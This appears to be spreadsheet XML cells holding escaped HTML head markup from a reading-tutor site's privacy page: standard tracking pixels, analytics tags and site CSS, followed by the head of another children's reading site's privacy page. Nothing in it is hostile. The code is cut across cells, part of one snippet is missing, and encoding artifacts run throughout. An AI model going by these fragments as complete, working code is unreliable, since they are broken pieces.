&lt;link rel='stylesheet' id='tablepress-default-css' href='https://www.readabilitytutor.com/wp-content/plugins/tablepress/css/build/default.css?ver=2.1' media='all' /&gt;
&lt;link rel='stylesheet' id='font-awesome-css' href='https://www.readabilitytutor.com/wp-content/plugins/bb-plugin/fonts/fontawesome/5.15.1/css/v4-shims.min.css?ver=2.4.1' media='all' /&gt;
&lt;link rel='stylesheet' id='popupaoc-public-style-css' href='https://www.readabilitytutor.com/wp-content/plugins/popup-anything-on-click/assets/css/popupaoc-public.css?ver=2.5' media='all' /&gt;
&lt;link rel='stylesheet' id='pp-animate-css' href='https://www.readabilitytutor.com/wp-content/plugins/bbpowerpack/assets/css/animate.min.css?ver=3.5.1' media='all' /&gt;
&lt;link rel='stylesheet' id='fl-builder-google-fonts-f8f00b5e4a597ba1dfad17197f429a12-css' href='//fonts.googleapis.com/css?family=Quicksand%3A500%2C600%2C700&amp;#038;ver=6.1.1' media='all' /&gt;
&lt;script src='https://www.readabilitytutor.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'&gt;&lt;/script&gt;
&lt;script src='https://www.readabilitytutor.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'&gt;&lt;/script&gt;
&lt;script src='https://www.readabilitytutor.com/wp-includes/js/imagesloaded.min.js?ver=6.1.1' id='imagesloaded-js'&gt;&lt;/script&gt;
&lt;link rel="https://api.w.org/" href="https://www.readabilitytutor.com/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://www.readabilitytutor.com/wp-json/wp/v2/pages/5748" /&gt;&lt;link</t>
  </si>
  <si>
    <t xml:space="preserve">rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.readabilitytutor.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.readabilitytutor.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel='shortlink' href='https://www.readabilitytutor.com/?p=5748' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://www.readabilitytutor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.readabilitytutor.com%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://www.readabilitytutor.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.readabilitytutor.com%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
		&lt;script&gt;
			var bb_powerpack = {
				ajaxurl: 'https://www.readabilitytutor.com/wp-admin/admin-ajax.php'
			};
		&lt;/script&gt;
		&lt;!-- Start of readabilitytutor Zendesk Widget script --&gt;_x005F_x000D_
&lt;script id="ze-snippet" src="https://static.zdassets.com/ekr/snippet.js?key=c021456f-1db8-477d-a9b2-37b645a05187" cookie-consent="tracking"&gt; &lt;/script&gt;_x005F_x000D_
&lt;!-- End of readabilitytutor Zendesk Widget script --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Start of ShareASale script --&gt;_x005F_x000D_
&lt;script src="https://www.dwin1.com/19038.js" type="text/javascript" defer="defer" cookie-consent="tracking"&gt;&lt;/script&gt;_x005F_x000D_
&lt;!-- End of ShareASale script --&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;script src="https://kit.fontawesome.com/d78d1f70af.js" crossorigin="anonymous"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Nextdoor Pixel Code --&gt;_x005F_x000D_
&lt;script type='text/javascript' cookie-consent='tracking'&gt;_x005F_x000D_
  (function(win, doc, sdk_url){_x005F_x000D_
  if(win.ndp) return;_x005F_x000D_
  var tr=win.ndp=function(){_x005F_x000D_
  tr.handleRequest? tr.handleRequest.apply(tr, arguments):tr.queue.push(arguments);_x005F_x000D_
};_x005F_x000D_
  tr.queue =</t>
  </si>
  <si>
    <t>[];_x005F_x000D_
  var s='script';_x005F_x000D_
  var new_script_section=doc.createElement(s);_x005F_x000D_
  new_script_section.async=!0;_x005F_x000D_
  new_script_section.src=sdk_url;_x005F_x000D_
  var insert_pos=doc.getElementsByTagName(s)[0];_x005F_x000D_
  insert_pos.parentNode.insertBefore(new_script_section, insert_pos);_x005F_x000D_
})(window, document, 'https://ads.nextdoor.com/public/pixel/ndp.js');_x005F_x000D_
_ x000D_
  ndp('init','564dfc0b-fa86-487d-8706-5a76f8301ef6', {})_ x000D_
  ndp('track','PAGE_VIEW');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;_x005F_x000D_
  &lt;img height="1" width="1" style="display:none" _x005F_x000D_
       src="https://flask.nextdoor.com/pixel?pid=564dfc0b-fa86-487d-8706-5a76f8301ef6&amp;ev=PAGE_VIEW&amp;noscript=1"/&gt;_x005F_x000D_
&lt;/noscript&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t>End Nextdoor Pixel Code --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Outbrain Pixel Code --&gt;_x005F_x000D_
&lt;script data-obct type = "text/javascript" cookie-consent="tracking"&gt;_x005F_x000D_
  /** DO NOT MODIFY THIS CODE**/_x005F_x000D_
  ! function(_window, _document) {_x005F_x000D_
    var OB_ADV_ID</t>
  </si>
  <si>
    <t>object : [object];_x005F_x000D_
      };_x005F_x000D_
      _window.obApi.marketerId = toArray(_window.obApi.marketerId).concat(toArray(OB_ADV_ID));_x005F_x000D_
      return;_x005F_x000D_
    }_x005F_x000D_
    var api = _window.obApi = function() {_x005F_x000D_
      api.dispatch ? api.dispatch.apply(api, arguments) : api.queue.push(arguments);_x005F_x000D_
    };_x005F_x000D_
    api.version = '1.1';_x005F_x000D_
    api.loaded = true;_x005F_x000D_
    api.marketerId = OB_ADV_ID;_x005F_x000D_
    api.queue</t>
  </si>
  <si>
    <t>END Outbrain Pixel Code --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Taboola Pixel Code --&gt;_x005F_x000D_
&lt;script type='text/javascript'&gt;_x005F_x000D_
  window._tfa = window._tfa || [];_x005F_x000D_
  window._tfa.push({notify: 'event', name: 'page_view', id: 1454645});_x005F_x000D_
  !function (t, f, a, x) {_x005F_x000D_
         if (!document.getElementById(x))</t>
  </si>
  <si>
    <t>{_x005F_x000D_
            t.async = 1;t.src = a;t.id=x;f.parentNode.insertBefore(t, f);_x005F_x000D_
         }_x005F_x000D_
  }(document.createElement('script'),_x005F_x000D_
  document.getElementsByTagName('script')[0],_x005F_x000D_
  '//cdn.taboola.com/libtrc/unip/1454645/tfa.js',_x005F_x000D_
  'tb_tfa_script');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;!-- End of Taboola Pixel Code --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Global site tag (gtag.js) - Google Analytics --&gt;_x005F_x000D_
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-146478292-1" cookie-consent="tracking"&gt;&lt;/script&gt;_x005F_x000D_
&lt;script&gt;_x005F_x000D_
  window.dataLayer = window.dataLayer ||</t>
  </si>
  <si>
    <t>[];_x005F_x000D_
  function gtag(){dataLayer.push(arguments);}_x005F_x000D_
  gtag('js', new Date());_x005F_x000D_
_x005F_x000D_
  gtag('config', 'UA-146478292-1');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
&lt;!-- Hotjar Tracking Code for https://www.readabilitytutor.com/ --&gt;_x005F_x000D_
&lt;script cookie-consent="tracking"&gt;_x005F_x000D_
    (function(h,o,t,j,a,r){_x005F_x000D_
        h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};_x005F_x000D_
        h._hjSettings={hjid:1259089,hjsv:6};_x005F_x000D_
        a=o.getElementsByTagName('head')[0];_x005F_x000D_
        r=o.createElement('script');r.async=1;_x005F_x000D_
        r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;_x005F_x000D_
        a.appendChild(r);_x005F_x000D_
    })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
&lt;script cookie-consent="tracking"&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':_x005F_x000D_
new Date().getTime(),event:'gtm.js'});var</t>
  </si>
  <si>
    <t>f=d.getElementsByTagName(s)[0],_x005F_x000D_
 j =d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=_x005F_x000D_
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);_x005F_x000D_
})(window,document,'script','dataLayer','GTM-PC9SPP8');&lt;/script&gt;_x005F_x000D_
&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">End Google Tag Manager --&gt;_x005F_x000D_
_x005F_x000D_
&lt;!-- Facebook Pixel Code --&gt;_x005F_x000D_
&lt;script cookie-consent="tracking"&gt;_x005F_x000D_
  ! function(f,b,e,v,n,t,s)_x005F_x000D_
  {if(f.fbq)return;n=f.fbq=function(){n.callMethod?_x005F_x000D_
  n.callMethod.apply(n,arguments):n.queue.push(arguments)};_x005F_x000D_
  </t>
  </si>
  <si>
    <t>if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';_x005F_x000D_
  n.queue=[];t=b.createElement(e);t.async=!0;_x005F_x000D_
  t.src=v;s=b.getElementsByTagName(e)[0];_x005F_x000D_
  s.parentNode.insertBefore(t,s)}(window, document,'script',_x005F_x000D_
  'https://connect.facebook.net/en_US/fbevents.js');_x005F_x000D_
  fbq('init', '686706125483223');_x005F_x000D_
  fbq('track', 'PageView');_x005F_x000D_
&lt;/script&gt;_x005F_x000D_
&lt;noscript&gt;&lt;img height="1" width="1" style="display:none"_x005F_x000D_
  src="https://www.facebook.com/tr?id=686706125483223&amp;ev=PageView&amp;noscript=1"_x005F_x000D_
/&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End Facebook Pixel Code --&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
_ x000D_
&lt;link rel="icon" href="https://www.readabilitytutor.com/staging/wp-content/uploads/2022/08/cropped-favicon-32x32.png" sizes="32x32" /&gt;_x005F_x000D_
&lt;link rel="icon" href="https://www.readabilitytutor.com/staging/wp-content/uploads/2022/08/cropped-favicon-192x192.png" sizes="192x192" /&gt;_x005F_x000D_
&lt;link rel="apple-touch-icon" href="https://www.readabilitytutor.com/staging/wp-content/uploads/2022/08/cropped-favicon-180x180.png" /&gt;  _x005F_x000D_
_x005F_x000D_
&lt;style media="screen"&gt;  html {_x005F_x000D_
margin-top: 0px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
}_x005F_x000D_
_ x000D_
@media screen and ( max-width: 782px ) {_x005F_x000D_
html {_ x000D_
	margin-top: 0px !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
}_x005F_x000D_
}_x005F_x000D_
&lt;/style&gt;_x005F_x000D_
&lt;style&gt;  _x005F_x000D_
@import url('https://fonts.googleapis.com/css2?family=Nunito+Sans:ital,wght@0,200;0,300;0,400;0,600;0,700;0,800;0,900;1,200;1,300;1,400;1,600;1,700;1,800;1,900&amp;family=Quicksand:wght@300;400;500;600;700&amp;display=swap');_x005F_x000D_
 @import url('https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,800;0,900;1,200;1,300;1,400;1,500;1,600;1,700;1,900&amp;display=swap');_x005F_x000D_
_x005F_x000D_
html {_x005F_x000D_
	margin: 0px!important; _x005F_x000D_
}_x005F_x000D_
 _x005F_x000D_
body {_x005F_x000D_
	padding: 0px!important;_x005F_x000D_
	background: #fff;_x005F_x000D_
}_x005F_x000D_
strong {_x005F_x000D_
	font-weight: bold!important;_x005F_x000D_
}_x005F_x000D_
.separate-containers .site-main {_x005F_x000D_
	margin: 0px;_x005F_x000D_
}_x005F_x000D_
.page-header, .sidebar .widget, .site-main&gt;* {_x005F_x000D_
	margin-bottom: 0px;_x005F_x000D_
}_x005F_x000D_
p {_x005F_x000D_
	margin-top: 10px;_x005F_x000D_
	margin-bottom: 10px;_x005F_x000D_
}_x005F_x000D_
a {_x005F_x000D_
	outline: none;_x005F_x000D_
	border: none;_x005F_x000D_
}_x005F_x000D_
#nav_menu-6, #nav_menu-7, section#media_image-3 {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.page-id-83 .fl-module.fl-module-heading.fl-node-63313af67d293, .page-id-83 .fl-module.fl-module-heading.fl-node-63313b38e5f85 {_x005F_x000D_
    display: none;_x005F_x000D_
}	_x005F_x000D_
.edu-blog #nav_menu-6, .edu-blog #nav_menu-7, .category-49 #nav_menu-6, .category-49 #nav_menu-7, .edu-blog.single-post section#text-2 {_x005F_x000D_
	display: block!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog.single-post header .widget-area {_x005F_x000D_
	display: block!important;_x005F_x000D_
	top: 0;_x005F_x000D_
}_x005F_x000D_
.edu-blog #nav_menu-2, .edu-blog #nav_menu-3, .edu-blog #nav_menu-9, .edu-blog #nav_menu-5, .category-49</t>
  </si>
  <si>
    <t>#nav_menu-2, .category-49 #nav_menu-5, .category-49 #nav_menu-3, .category-49 #nav_menu-9, .category-49</t>
  </si>
  <si>
    <t>#nav_menu-8, .edu-blog.single-post #nav_menu-8, .edu-blog section#nav_menu-10, .edu-blog #custom_html-6 {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-blog section#nav_menu-3, .edu-blog section#nav_menu-8, .edu-blog section#nav_menu-9, .edu-blog #text-4, .edu-blog.single-post #text-4, .category-49 #text-4, .none-code {_x005F_x000D_
	display: none!important;_x005F_x000D_
}_x005F_x000D_
.no-sidebar .entry-header, .no-sidebar .comments-area {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.no-sidebar .inside-article {_x005F_x000D_
	padding: 0px!important;_x005F_x000D_
}_x005F_x000D_
.no-sidebar .site.grid-container {_x005F_x000D_
	width: 100%!important;_x005F_x000D_
	max-width: 100%;_x005F_x000D_
	padding: 0px!important;_x005F_x000D_
}_x005F_x000D_
.entry-content:not(:first-child), .entry-summary:not(:first-child), .page-content:not(:first-child) {_x005F_x000D_
	margin-top: 0;_x005F_x000D_
}_x005F_x000D_
#signup {_x005F_x000D_
	width: 100%;_x005F_x000D_
	float: right;_x005F_x000D_
	text-align: right;_x005F_x000D_
}_x005F_x000D_
div#signup .fields {_x005F_x000D_
	width: 66%!important;_x005F_x000D_
	float: left;_x005F_x000D_
}_x005F_x000D_
div#signup .fields input {_x005F_x000D_
	width: 100%;_x005F_x000D_
}_x005F_x000D_
div#signup button#lp-pom-button-810 {_x005F_x000D_
	float: left;_x005F_x000D_
	margin-top: 2px;_x005F_x000D_
	padding: 12px 30px;_x005F_x000D_
}_x005F_x000D_
#breadcrumbs:before {_x005F_x000D_
	content: "You are here:";_x005F_x000D_
	font-family: 'Quicksand';_x005F_x000D_
	font-weight: 500;_x005F_x000D_
	font-size: 14px;_x005F_x000D_
	margin-right: 10px;_x005F_x000D_
}_x005F_x000D_
.button_wrapper a {_x005F_x000D_
	border-style: none;_x005F_x000D_
	border-radius: 100px;_x005F_x000D_
	background: rgba(45,218,205,1);_x005F_x000D_
	color: #000;_x005F_x000D_
	font-size: 22px;_x005F_x000D_
	line-height: 22px;_x005F_x000D_
	font-weight: 700;_x005F_x000D_
	font-family: Quicksand!important;_x005F_x000D_
	font-style: normal;_x005F_x000D_
	text-align: center;_x005F_x000D_
	padding: 14px 40px;_x005F_x000D_
	text-decoration: none!important;_x005F_x000D_
	box-shadow: 0px 2px 7px rgba(0, 0, 0, 0.24)!important;_x005F_x000D_
	width: 100%;_x005F_x000D_
	margin-top: 10px!important;_x005F_x000D_
}_x005F_x000D_
.single-post .main_footer { _x005F_x000D_
	display: none!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog.single-post .newtheme-footer {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.single-post section#text-2, .single-post #nav_menu-5 {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-blog footer.site-footer, .edu-blog.single-post footer.site-footer {_x005F_x000D_
	background: transparent!important;_x005F_x000D_
}_x005F_x000D_
.single-post .newtheme-footer {_x005F_x000D_
	display: block;_x005F_x000D_
}_x005F_x000D_
.edu-blog .breadcrumb, .category-49 .breadcrumb, .single-post .breadcrumb {_x005F_x000D_
	background-color: #1B0041;_x005F_x000D_
}_x005F_x000D_
.breadcrumb a:hover {_x005F_x000D_
	color: #f28887!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog.single-post .menu-item-5243 a, .edu-blog.single-post .sidebar.sidebar-primary.widget-area .menu-item-5243 a, .category-49 .menu-item-5243 a, .category-49 .sidebar.sidebar-primary.widget-area .menu-item-5243 a {_x005F_x000D_
	color: #2DDACD!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .breadcrumb .breadcrumb-link-wrap:nth-child(1), .category-49 .breadcrumb span {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-blog .current-menu-item a, .category-49 .current-menu-item a, #menu-edu-menu-1 .current-menu-item a, #menu-edu-menu a:hover {_x005F_x000D_
	color: #2DDACD!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .entry-title, .category-49 .entry-title {_x005F_x000D_
	font-family: 'Nunito'!important;_x005F_x000D_
	font-weight: bold;_x005F_x000D_
	margin-bottom: 40px;_x005F_x000D_
}_x005F_x000D_
.edu-blog header {_x005F_x000D_
	z-index: 9999!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .rt-detail {_x005F_x000D_
	border: none;_x005F_x000D_
}_x005F_x000D_
.edu-blog .rt-holder {_x005F_x000D_
	border-radius: 5px;_x005F_x000D_
	box-shadow: 0px 2px 7px rgba(0, 0, 0, 0.19)!important;_x005F_x000D_
	border: none!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .post-meta a {_x005F_x000D_
	border-radius: 30px;_x005F_x000D_
	padding: 8px 30px!important;_x005F_x000D_
	font-weight: bold;_x005F_x000D_
	font-family: 'Nunito';_x005F_x000D_
}_x005F_x000D_
.edu-blog .post-meta {_x005F_x000D_
	text-align: center;_x005F_x000D_
}_x005F_x000D_
.edu-blog .title-area, .category-49 .title-area, .category-49 .post-5242 {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-blog .site-title a {_x005F_x000D_
	background: url(https://www.readabilitytutor.com/staging/wp-content/uploads/2022/07/edu-logo-readability.png) no-repeat !</t>
  </si>
  <si>
    <t>important;_x005F_x000D_
	background-size: contain!important;_x005F_x000D_
	width: 100%!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog section#media_image-3, .category-49 section#media_image-3 {_x005F_x000D_
	width: 386px ! important;_x005F_x000D_
	max-width: 386px;_x005F_x000D_
	padding: 10px 0px!important;_x005F_x000D_
	float: left;_x005F_x000D_
	display: block!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .site-header, .category-49 .site-header {_x005F_x000D_
	background-color: #fff!important;_x005F_x000D_
	box-shadow: 0px 8px 15px 0px rgb(2 0 0 / 8%);_x005F_x000D_
}_</t>
  </si>
  <si>
    <t>x000D_
.site-header .widget-area {_x005F_x000D_
	margin-left: 32px!important;_x005F_x000D_
}_x005F_x000D_
#nav_menu-7 {_x005F_x000D_
	text-align: right;_x005F_x000D_
	padding: 7px 0;_x005F_x000D_
}_x005F_x000D_
#nav_menu-7 a {_x005F_x000D_
	color: #000;_x005F_x000D_
	font-size: 20px;_x005F_x000D_
	margin: 0 10px;_x005F_x000D_
}_x005F_x000D_
#nav_menu-7 a:last-child {_x005F_x000D_
	margin-right: 0px;_x005F_x000D_
}_x005F_x000D_
.edu-blog header .widget-area, .category-49 header .widget-area {_x005F_x000D_
	width: 94%!important;_x005F_x000D_
}_x005F_x000D_
.edu-inner-post .site-inner {_x005F_x000D_
	padding: 0px;_x005F_x000D_
	background: #fff;_x005F_x000D_
}_x005F_x000D_
.edu-inner-post .breadcrumb {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
	_x005F_x000D_
.cursor {_x005F_x000D_
	position: relative;_x005F_x000D_
}_x005F_x000D_
.cursor i {_x005F_x000D_
    position: absolute;_x005F_x000D_
    width: 1px;_x005F_x000D_
    height: 38%;_x005F_x000D_
    background-color: gray;_x005F_x000D_
    left: 15px;_x005F_x000D_
    top: 30%;_x005F_x000D_
    animation-name: blink;_x005F_x000D_
    animation-duration: 800ms;_x005F_x000D_
    animation-iteration-count: infinite;_x005F_x000D_
    opacity: 1;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
.cursor input:focus + i {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
_x005F_x000D_
@keyframes blink {_x005F_x000D_
	from { opacity: 1; }_x005F_x000D_
	to { opacity: 0; }_x005F_x000D_
}	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
	_x005F_x000D_
.listing {_x005F_x000D_
	width: 100%!important;_x005F_x000D_
	float: left!important;_x005F_x000D_
	text-align: left!important;_x005F_x000D_
	margin: 0px!important;_x005F_x000D_
	background: transparent!important;_x005F_x000D_
	padding: 0px!important;_x005F_x000D_
}_x005F_x000D_
.button_wrapper {_x005F_x000D_
	display: block;_x005F_x000D_
	margin: 80px 0 30px 0;_x005F_x000D_
	text-align: center;_x005F_x000D_
	float: left;_x005F_x000D_
	width: 100%;_x005F_x000D_
}_x005F_x000D_
.category-49</t>
  </si>
  <si>
    <t>.entry, .edu-blog .entry {_x005F_x000D_
	padding: 50px 30px;_x005F_x000D_
}_x005F_x000D_
.category-49 header.entry-header, .edu-blog .entry-header {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.white-footer footer {_x005F_x000D_
	background: #fff!important;_x005F_x000D_
}_x005F_x000D_
.edu-footer {_x005F_x000D_
	font-weight: 400;_x005F_x000D_
	font-size: 14px;_x005F_x000D_
	text-align: center;_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-inner-post .site-footer {_x005F_x000D_
	background: #fff;_x005F_x000D_
}_x005F_x000D_
.edu-blog .edu-footer, .category-49 .edu-footer {_x005F_x000D_
	display: block!important;_x005F_x000D_
}_x005F_x000D_
.edu-blog .main_footer, .category-49 .main_footer {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-inner-post .entry-header, .edu-inner-post #custom_html-5, .edu-inner-post .entry-meta {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
.edu-inner-post article {_x005F_x000D_
	padding: 0px!important;_x005F_x000D_
}_x005F_x000D_
.footer-logo {_x005F_x000D_
	margin-bottom: 20px;_x005F_x000D_
}_x005F_x000D_
.footer-logo img {_x005F_x000D_
	width: 22%;_x005F_x000D_
}_x005F_x000D_
.banner_wrapper {_x005F_x000D_
	width: 100%;_x005F_x000D_
	align-items: center;_x005F_x000D_
	padding: 0px;_x005F_x000D_
	display: inline-block;_x005F_x000D_
}_x005F_x000D_
.banner_content {_x005F_x000D_
	width: 100%;_x005F_x000D_
}_x005F_x000D_
.feature_img {_x005F_x000D_
	width: 100%;_x005F_x000D_
	margin: 40px 0;_x005F_x000D_
}_x005F_x000D_
.feature_img</t>
  </si>
  <si>
    <t xml:space="preserve">img {_x005F_x000D_
	border-radius: 30px;_x005F_x000D_
}_x005F_x000D_
.banner_content h4 {_x005F_x000D_
	font-family: Nunito!important;_x005F_x000D_
	color: #1B0041;_x005F_x000D_
	font-size: 18px;_x005F_x000D_
	font-weight: 600;_x005F_x000D_
}_x005F_x000D_
.banner_content h1 {_x005F_x000D_
	color: #1B0041;_x005F_x000D_
	font-size: 60px;_x005F_x000D_
	font-weight: 800;_x005F_x000D_
	font-family: Nunito!important;_x005F_x000D_
}_x005F_x000D_
.banner_content p {_x005F_x000D_
	color: #1B0041;_x005F_x000D_
	font-size: 25px;_x005F_x000D_
	font-weight: 700;_x005F_x000D_
	font-family: Nunito!important;_x005F_x000D_
	line-height: 1.2;_x005F_x000D_
}_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">.blog_content_wrapper p, .blog_content_wrapper li, .blog_content_wrapper h4 strong {_x005F_x000D_
	font-family: Quicksand!important;_x005F_x000D_
	font-weight: 500;_x005F_x000D_
}_x005F_x000D_
.blog_btn a span {_x005F_x000D_
	font-family: Quicksand!important;_x005F_x000D_
	font-weight: 700;_x005F_x000D_
}_x005F_x000D_
.blog_content_wrapper a {_x005F_x000D_
	text-decoration: underline!important;_x005F_x000D_
}_x005F_x000D_
.hard-font {_x005F_x000D_
	font-family: Nunito!important;_x005F_x000D_
}_x005F_x000D_
.blog_content_wrapper h3 {_x005F_x000D_
	margin-top: 30px;_x005F_x000D_
	display: inline-block;_x005F_x000D_
}_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">.blog_content_wrapper h3 strong {_x005F_x000D_
	font-family: Nunito!important;_x005F_x000D_
	font-size: 36px;_x005F_x000D_
}_x005F_x000D_
 .blog_content_wrapper h4 strong {_x005F_x000D_
	font-weight: 800;_x005F_x000D_
}_x005F_x000D_
.form_wrapper {_x005F_x000D_
	display: inline-block;_x005F_x000D_
	width: 100%;_x005F_x000D_
}_x005F_x000D_
.form_input input {_x005F_x000D_
	border: 2px solid #ccc!important;_x005F_x000D_
	border-radius: 10px!important;_x005F_x000D_
	padding: 10px!important;_x005F_x000D_
}_x005F_x000D_
.form_input {_x005F_x000D_
	width: 50%;_x005F_x000D_
}_x005F_x000D_
.form_fields {_x005F_x000D_
	display: flex;_x005F_x000D_
	align-items: center;_x005F_x000D_
	margin-bottom: 0px!important;_x005F_x000D_
	width: 100%;_x005F_x000D_
}_x005F_x000D_
.form_fields label {_x005F_x000D_
	font-family: Quicksand;_x005F_x000D_
	font-weight: 600;_x005F_x000D_
	font-size: 18px;_x005F_x000D_
	line-height: 20px;_x005F_x000D_
	color: #000;_x005F_x000D_
	display: inline-block;_x005F_x000D_
	width: auto;_x005F_x000D_
	margin-right: 12px;_x005F_x000D_
}_x005F_x000D_
.form_submit {_x005F_x000D_
	text-align: right;_x005F_x000D_
	display: inline-block;_x005F_x000D_
	float: right;_x005F_x000D_
	width: 50%;_x005F_x000D_
}_x005F_x000D_
input.wpcf7-form-control.has-spinner.wpcf7-submit.download-btn {_x005F_x000D_
	text-transform: none;_x005F_x000D_
}_x005F_x000D_
.form_submit input {_x005F_x000D_
	border-style: none;_x005F_x000D_
	border-radius: 100px;_x005F_x000D_
	background: rgba(45,218,205,1);_x005F_x000D_
	color: #000;_x005F_x000D_
	font-size: 20px;_x005F_x000D_
	line-height: 20px;_x005F_x000D_
	font-weight: 700;_x005F_x000D_
	font-family: Quicksand!important;_x005F_x000D_
	font-style: normal;_x005F_x000D_
	text-transform: normal!important;_x005F_x000D_
	text-align: center;_x005F_x000D_
	padding: 14px 0px;_x005F_x000D_
	text-decoration: none!important;_x005F_x000D_
	box-shadow: 0px 2px 7px rgba(0, 0, 0, 0.24)!important;_x005F_x000D_
	width: 100%;_x005F_x000D_
	margin-top: 10px!important;_x005F_x000D_
}_x005F_x000D_
</t>
  </si>
  <si>
    <t>.form_submit input:hover {_ x000D_
	background: #22cfc0!important;_x005F_x000D_
	color: #000!important;_x005F_x000D_
}_x005F_x000D_
span.wpcf7-spinner {_x005F_x000D_
	display: none;_x005F_x000D_
}_x005F_x000D_
ul.listing-03, .listing {_x005F_x000D_
	position: relative;_x005F_x000D_
	margin: 0px!important;_x005F_x000D_
}_x005F_x000D_
ul.listing-03 li {_x005F_x000D_
	font-family: Quicksand!important;_x005F_x000D_
	text-align: left;_x005F_x000D_
	font-weight: 700;_x005F_x000D_
	color: #1B0041;_x005F_x000D_
	font-size: 22px;_x005F_x000D_
	line-height: 1.4;_x005F_x000D_
	list-style: none;_x005F_x000D_
	margin-bottom: 22px;_x005F_x000D_
}_x005F_x000D_
ul.listing-03 li:before {_x005F_x000D_
	content: "";_x005F_x000D_
	font-family: fontawesome</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
  &lt;head&gt;
  &lt;meta charset="utf-8"&gt;
  &lt;title&gt;Privacy Policy – ABC Reading Eggs&lt;/title&gt;
  &lt;meta name="description" content="Read the ABC Reading Eggs policy regarding information supplied to us by our members. Try a FREE 14 day trial of ABC Reading Eggs today!"&gt;
  &lt;meta name="keywords" content="learn to read,learn,read,learning,reading,abc,parent,teacher,interactive,kid,kids,play,playful,game,games,activity,activities,fun,online"&gt;
  &lt;meta name="author" content=""&gt;
  &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
  &lt;meta name="p:domain_verify" content="b408abe24e92dd1af51737e3a670336b"/&gt;
  &lt;link rel="alternate" hreflang="x-default"
        href="https://readingeggs.com/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-gb"
        href="https://readingeggs.co.uk/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-us"
        href="https://readingeggs.com/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-au"
        href="https://readingeggs.com.au/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-nz"
        href="https://readingeggs.co.nz/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-za"
        href="https://readingeggs.co.za/privacy/" /&gt;
  &lt;link rel="alternate" hreflang="en-ca"
        href="https://readingeggs.ca/privacy/" /&gt;
